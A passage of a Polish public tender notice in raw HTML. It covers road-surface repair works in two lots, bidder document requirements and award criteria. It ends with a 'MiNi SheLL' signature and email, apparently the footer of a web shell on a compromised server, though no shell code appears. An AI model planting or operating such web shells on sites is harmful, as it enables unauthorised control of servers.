w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2016 r. poz. 716), według załącznika nr 6 do SIWZ.
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 5.3.1-5.3.3 SIWZ składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
- nie zalega z opłacaniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne 
albo że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz 
z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
- nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 5.4 SIWZ zastępuje się je dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych 
do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy lub miejsce zamieszkania 
tej osoby. 

</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1. wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, 
w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia 
i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, według załącznika nr 8 do SIWZ,
2. oświadczenia na temat wykształcenia i kwalifikacji zawodowych Wykonawcy lub kadry kierowniczej, wg załącznika nr 10 do SIWZ.
3. Dokumenty dotyczące podmiotu trzeciego wskazane w pkt 5.3.1  5.3.4, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełnienia warunków udziału  postępowaniu, w zakresie, w jakim Wykonawca powołuje się na zasoby podmiotu trzeciego.
4. wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, według załącznika nr 7, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone
-Zamawiający żąda przedstawienia w wykazie jedynie robót budowlanych, które potwierdzą spełnienie warunku wiedzy i doświadczenia w niniejszym postępowaniu.
-Dowodami potwierdzającymi czy roboty budowlane zostały wykonane należycie są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty.
5. wykazu narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami  wg załącznika nr 9 do SIWZ  do Części nr 1  nawierzchnie nieutwardzone.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Pełnomocnictwo do podpisania oferty w imieniu Wykonawcy (jeżeli dotyczy).
Zobowiązanie podmiotu trzeciego  zgodnie z załącznikiem nr 11 do SIWZ (jeżeli dotyczy.
Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji z otwarcia ofert, o której mowa w art. 86 ust. 5 ustawy Pzp, jest zobowiązany do przekazania Zamawiającemu 
w formie pisemnej lub elektronicznej opatrzonej bezpiecznym podpisem kwalifikowanym, oświadczenia o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Pzp. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. Wzór oświadczenia stanowi załącznik nr 5 do SIWZ.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin gwarancji</td><td>24</td></tr><tr><td>Zatrudnienie na podstawie umowy o pracę</td><td>16</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1. W zakresie Części nr 1 i Części nr 2 Zamawiający przewiduje możliwość zmiany wynagrodzenia Wykonawcy wynikającego z oferty, w przypadku zmiany ilości robót budowlanych / remontów do wykonania.
2. Zmiany umowy wymagają dla swej ważności formy pisemnej, pod rygorem nieważności.
3. Istotne dla stron postanowienia umowy znajdują się we wzorach umów wskazanych w pkt 16.1 SIWZ.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 28/04/2017, godzina: 9:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Remont nawierzchni nieutwardzonych<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Remont nawierzchni drogi bez doziarnienia:
wyprofilowanie i zagęszczenie całego odcinka pasa jezdnego poprzez zerwanie               w granicach 5-10 cm istniejącej warstwy żużlowej, ponowne jej wbudowanie                    i doprowadzenie ulicy do pierwotnej niwelety,
doprowadzenie całego odcinka pasa jezdnego, przy zastosowaniu równiarki, do jednorodnego profilu podłużnego w granicach 0,5%-1,0%, natomiast przekrój poprzeczny w zależności od szerokości pasa jezdnego:
jednostronny przy szerokości 5 m,
dwustronny daszkowy przy szerokości 6 m,
wykonanie spadku poprzecznego w granicach 3%-4%,
uwałowanie przy zastosowaniu walca.
Remont nawierzchni drogi z doziarnieniem żużlem w ilości 30 kg/m2:
wyprofilowanie i zagęszczenie całego odcinka pasa jezdnego poprzez zerwanie              w granicach 5-10 cm istniejącej warstwy żużlowej, ponowne jej wbudowanie                      i doprowadzenie ulicy do pierwotnej niwelety,
doprowadzenie całego odcinka pasa jezdnego, przy zastosowaniu równiarki, do jednorodnego profilu podłużnego w granicach 0,5%-1,0%, natomiast przekrój poprzeczny w zależności od szerokości pasa jezdnego: 
jednostronny przy szerokości 5 m,
dwustronny daszkowy przy szerokości 6 m,
wykonanie spadku poprzecznego w granicach 3%-4%,
uwałowanie przy zastosowaniu walca,
wykonanie doziarnienia żużlem w ilości 30 kg/m2 i uwałowanie przy zastosowaniu walca.
Remont nawierzchni drogi z doziarnieniem kruszywem frakcji 0-31,5 mm w ilości                 30 kg/m2:
wyprofilowanie i zagęszczenie całego odcinka pasa jezdnego poprzez zerwanie               w granicach 5-10 cm istniejącej warstwy żużlowej, ponowne jej wbudowanie                         i doprowadzenie ulicy do pierwotnej niwelety,
doprowadzenie całego odcinka pasa jezdnego, przy zastosowaniu równiarki, do jednorodnego profilu podłużnego w granicach 0,5%-1,0%, natomiast przekrój poprzeczny w zależności od szerokości pasa jezdnego:
jednostronny przy szerokości 5 m,
dwustronny daszkowy przy szerokości 6 m,
wykonanie spadku poprzecznego w granicach 3%-4%,
uwałowanie przy zastosowaniu walca,
wykonanie doziarnienia kruszywem frakcji 0-31,5 mm w ilości 30 kg/m2 i uwałowanie przy zastosowaniu walca.
Wykonanie nawierzchni z kruszywa frakcji 0-31,5 mm gr. 5 cm:
doprowadzenie całego odcinka pasa jezdnego, przy zastosowaniu równiarki, do jednorodnego profilu podłużnego w granicach 0,5%-1,0%,
uwałowanie przy zastosowaniu walca,
ułożenie nawierzchni z kruszywa frakcji 0-31,5 mm gr. 5 cm (po uwałowaniu),
uwałowanie przy zastosowaniu walca.
Wykonanie nawierzchni z gruzu budowlanego gr. 5 cm:                                                                                                                                        
wyprofilowanie i zagęszczenie całego odcinka pasa jezdnego,
ułożenie nawierzchni z gruzu budowlanego gr. 5 cm (po uwałowaniu),
uwałowanie przy zastosowaniu walca,
Wykonanie nawierzchni z gruzu budowlanego gr. 10 cm:
wyprofilowanie i zagęszczenie całego odcinka pasa jezdnego,
ułożenie nawierzchni z gruzu budowlanego gr. 10 cm (po uwałowaniu),
uwałowanie przy zastosowaniu walca,
Ułożenie płyt drogowych (materiał Inwestora) o wym. 3 m x 1,5 m na podsypce piaskowej    gr. 10 cm z dowozem na odległość do 3 km:
korytowanie na głębokości 25 cm,
położenie warstwy odsączającej z piasku gr. 10 cm,
położenie płyt drogowych.
Ułożenie płyt drogowych (materiał Wykonawcy) o wym. 3 m x 1,5 m na podsypce piaskowej gr. 10 cm:
korytowanie na głębokości 25 cm,
położenie warstwy odsączającej z piasku gr. 10 cm,
położenie płyt drogowych.
Regulacja krawężnika:
rozbiórka i ponowne ułożenie krawężnika na podsypce cementowo-piaskowej,
Ułożenie kostki betonowej-brukowej gr. 8 cm na podbudowie:
korytowanie na gł. 30 cm i wywóz,
warstwa odsączającą z piasku gr. 10 cm,
warstwa kruszywa łamanego o frakcji 0-31,5 mm gr. 15 cm,
podsypka cementowo-piaskowa gr. 3 cm w stosunku 1:4,
ułożenie kostki betonowej-brukowej gr. 8 cm,
Remont nawierzchni drogi z doziarnieniem żużlem w ilości 10 kg/m2:
wyprofilowanie i zagęszczenie całego odcinka pasa jezdnego poprzez zerwanie            w granicach 5-10 cm istniejącej warstwy żużlowej, ponowne jej wbudowanie                   i doprowadzenie ulicy do pierwotnej niwelety,
doprowadzenie całego odcinka pasa jezdnego, przy zastosowaniu równiarki, do jednorodnego profilu podłużnego w granicach 0,5%-1%, natomiast przekrój poprzeczny w zależności od szerokości pasa jezdnego:
jednostronny przy szerokości 5 m,
dwustronny daszkowy przy szerokości 6 m,
wykonanie spadku poprzecznego w granicach 3%-4%,
uwałowanie przy zastosowaniu walca,
wykonanie doziarnienia żużlem w ilości 10 kg/m2 i uwałowanie przy zastosowaniu walca,
Remont nawierzchni drogi z doziarnieniem kruszywem frakcji 0-31,5 mm w ilości 10 kg/m2:
wyprofilowanie i zagęszczenie całego odcinka pasa jezdnego poprzez zerwanie           w granicach 5-10 cm istniejącej warstwy żużlowej, ponowne jej wbudowanie                   i doprowadzenie ulicy do pierwotnej niwelety,
doprowadzenie całego odcinka pasa jezdnego, przy zastosowaniu równiarki, do jednorodnego profilu podłużnego w granicach 0,5%-1,0%, natomiast przekrój poprzeczny w zależności od szerokości pasa jezdnego:
jednostronny przy szerokości 5 m,
dwustronny daszkowy przy szerokości 6 m,
wykonanie spadku poprzecznego w granicach 3%-4%,
uwałowanie przy zastosowaniu walca,
wykonanie doziarnienia kruszywem frakcji 0-31,5 mm w ilości 10 kg/m2 i uwałowanie przy zastosowaniu walca,
Regulacja płyt typu IOMB:
rozbiórka płyt typu IOMB,
wykonanie podsypki piaskowej gr. 10 cm,
ponowne ułożenie płyt,
Wykonanie nawierzchni z gruzu budowlanego gr. 5 cm (materiał Inwestora):
wyprofilowanie i zagęszczenie całego odcinka pasa jezdnego,
ułożenie nawierzchni z gruzu budowlanego gr. 5 cm (po uwałowaniu),
uwałowanie przy zastosowaniu walca,
Wykonanie nawierzchni z gruzu budowlanego gr. 10 cm (materiał Inwestora):
wyprofilowanie i zagęszczenie całego odcinka pasa jezdnego,
ułożenie nawierzchni z gruzu budowlanego gr. 10 cm (po uwałowaniu),
uwałowanie przy zastosowaniu walca.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233140-2, 45233142-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin gwarancji</td><td>24</td></tr><tr><td>Zatrudnienie na podstawie umowy o pracę</td><td>16</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Remont nawierzchni utwardzonych<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Rozbiórka istniejącej nawierzchni: z kostki betonowej-brukowej gr. 6 cm i 8 cm, płytek 50x50x7 lub 35x35x5:
podsypka piaskowa gr. 5-10 cm,
ułożenie nawierzchni w przeliczeniu na 1 m2 z kostki betonowej-brukowej, płytek o wym. jw.,
Rozbiórka nawierzchni z trylinki gr. 12-15 cm,
podsypka piaskowa gr. 5 cm,
podsypka cementowo-piaskowa gr. 15 cm,
ponowne ułożenie trylinki w przeliczeniu na 1 m2,
Rozbiórka nawierzchni z płytek 35x35x5:
podsypka piaskowa gr. 5-10 cm,
ułożenie nawierzchni z kostki betonowej-brukowej gr. 6 cm, w przeliczeniu na 1 m2,
Rozbiórka nawierzchni z kamienia:
wykonanie koryta o gł. 10 cm,
wykonanie podsypki cementowo-piaskowej gr. 10 cm,
ułożenie kostki kamiennej (kamienia brukowego),
Ułożenie krawężnika na ławie betonowej z oporem  1 mb,
Ułożenie krawężnika na ławie betonowej zwykłej  1 mb,
Ułożenie obrzeża na podsypce piaskowej  1 mb,
Wykonanie podsypki piaskowej gr. 5 cm,
Wykonanie podsypki piaskowej gr.10 cm,
Rozbiórka nawierzchni bitumicznej gr. 4 cm,
Rozbiórka krawężnika na ławie betonowej,
Korytowanie gr. 5 cm,
Korytowanie gr. 10 cm.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233140-2, 45233142-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin gwarancji</td><td>24</td></tr><tr><td>Zatrudnienie na podstawie umowy o pracę</td><td>16</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com